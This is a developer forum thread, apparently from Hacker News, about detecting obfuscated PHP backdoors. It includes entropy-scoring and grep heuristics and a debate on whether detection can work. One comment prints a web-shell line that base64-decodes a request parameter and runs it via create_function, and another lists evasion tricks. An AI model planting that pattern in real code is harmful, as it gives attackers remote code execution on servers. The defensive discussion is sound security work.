It's hard to find obfuscated versions of this stuff. Ran across this recently... <?php $z0=$...

egwynn · on Jan 24, 2019

You might be able to catch that by looking for lines with unusually high entropy. Something like this: https://codereview.stackexchange.com/a/909
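For illustration, a minimal sketch of what a per-line entropy check could look like. This is not the code from the linked answer; the function names, the 4.5 bits-per-character threshold and the 40-character minimum length are all assumptions that would need tuning against a real code base.

```python
import math
from collections import Counter


def shannon_entropy(text: str) -> float:
    """Return the Shannon entropy of text in bits per character."""
    if not text:
        return 0.0
    counts = Counter(text)
    total = len(text)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def high_entropy_lines(source: str, threshold: float = 4.5, min_length: int = 40):
    """Yield (line_number, entropy) for long lines above the threshold.

    threshold and min_length are assumed defaults, not established values.
    Short lines are skipped because their entropy estimate is too noisy.
    """
    for number, line in enumerate(source.splitlines(), start=1):
        stripped = line.strip()
        if len(stripped) >= min_length:
            entropy = shannon_entropy(stripped)
            if entropy > threshold:
                yield number, entropy
```

Calling `list(high_entropy_lines(open(path).read()))` on each file gives the line numbers worth a manual look. Base64 blobs tend to score high, but so do minified assets and embedded keys, so expect noise.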

acdha · on Jan 24, 2019

The problem with approaches like this is that they're prone to false positives and false negatives. Take the example above: you could move more of the payload into the REQUEST variable (say, a Cookie header), or make more use of the array of numbers so that no individual token is that noteworthy. You could toss it into a wrapper so that someone sees something which looks like (and may actually be) an x509 cert or GPG public key, with some misleading comment about it being used to verify updates. Or you could toss it into an image or other “fixture” in a test directory à la event-stream, etc.

This is a much harder problem than anything someone is going to come up with in an HN reply on first reaction. People have been working on it for decades but it's especially hard because once a technique becomes popular an attacker can run offline attacks against it and not release their exploit until they've confirmed that it's not detected.

_cereal · on Jan 24, 2019

Agreed that it is difficult to catch. For the record, in this case both functions are present; the output looks something like this:

  $j6 = create_function('', base64_decode($_REQUEST['sort']));
  $j6(); // execution

`create_function()`[1] executes `eval()` internally, so the result is the same.

[1] http://php.net/create_function

dotancohen · on Jan 24, 2019

Grep for multiple semicolons on a line. Or lines exceeding N characters. Or `$_` outside some specific places. Or multiple short variable names on the same line. Or "<?php[^$]".

Salt and flavour per your coding style and code base.
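As a rough sketch, those greps could be combined into one pass like this. The rule names, the `MAX_LINE_LENGTH` value standing in for N, and the `allow_superglobals` switch are all hypothetical; the `<?php[^$]` pattern is taken literally from above.

```python
import re

MAX_LINE_LENGTH = 200  # assumed value for "N"; tune per code base

# "$" followed by one or two word characters, e.g. $a or $j6 (assumed definition of "short").
SHORT_VAR = re.compile(r"\$[A-Za-z]\w?\b")
# The "<?php[^$]" pattern, used as written: "<?php" followed by any character except "$".
OPEN_TAG = re.compile(r"<\?php[^$]")


def suspicious_lines(source: str, allow_superglobals: bool = False):
    """Return a list of (line_number, [reasons]) for lines matching any heuristic."""
    findings = []
    for number, line in enumerate(source.splitlines(), start=1):
        reasons = []
        if line.count(";") > 1:
            reasons.append("multiple semicolons")
        if len(line) > MAX_LINE_LENGTH:
            reasons.append("long line")
        # Pass allow_superglobals=True for files where "$_" is expected.
        if not allow_superglobals and "$_" in line:
            reasons.append("$_ usage")
        if len(SHORT_VAR.findall(line)) > 1:
            reasons.append("multiple short variable names")
        if OPEN_TAG.search(line):
            reasons.append("text after <?php")
        if reasons:
            findings.append((number, reasons))
    return findings
```

Ordinary `for (...; ...; ...)` loops will trip the semicolon rule, which is part of the false-positive cost of rules like these.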

jerf · on Jan 24, 2019

No, that's just an arms race, and it's advantage attacker since in security we generally assume the attacker has our source and executables. Plus it's ultimately an instance of the halting problem; there is no way to run code to determine if another piece of code is "good" for any sensible definition of "good". (See Rice's Theorem.)

You need to ensure bad stuff can't get in, not let stuff in and try to determine what's bad after the fact.

dotancohen · on Jan 27, 2019

What aspect of information security is not inherently advantage attacker?

Regarding "ensure bad stuff can't get in", that is a completely different aspect. No matter how well you "ensure", bad stuff will always get in. Thus security is done in layers.

doublekill · on Jan 24, 2019

You could create a readability score from normal non-malicious code.

Even though I do not know what the above code does, I can tell at a glance that this is not normal code. A machine could too.
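One possible reading of such a score, sketched under heavy assumptions: train a character-bigram model with add-one smoothing on code known to be fine, then rate each line by its average log-probability per character. The `BigramModel` class and its smoothing choice are illustrative, not an established method for this, and an attacker who knows the model can write code that scores well.

```python
import math
from collections import Counter


class BigramModel:
    """Character-bigram model trained on a corpus of known-good code."""

    def __init__(self, corpus: str):
        self.pairs = Counter(zip(corpus, corpus[1:]))  # counts of (char, next_char)
        self.firsts = Counter(corpus[:-1])             # counts of chars that have a successor
        self.vocab = len(set(corpus)) + 1              # +1 slot for unseen characters

    def score(self, text: str) -> float:
        """Average log2 probability per bigram; lower means less like the corpus."""
        if len(text) < 2:
            return 0.0
        total = 0.0
        for a, b in zip(text, text[1:]):
            # Add-one smoothing so unseen bigrams get a small non-zero probability.
            p = (self.pairs[(a, b)] + 1) / (self.firsts[a] + self.vocab)
            total += math.log2(p)
        return total / (len(text) - 1)
```

In use, `BigramModel(known_good_source).score(line)` would be computed for each line, and lines scoring well below the typical value for the code base flagged for review.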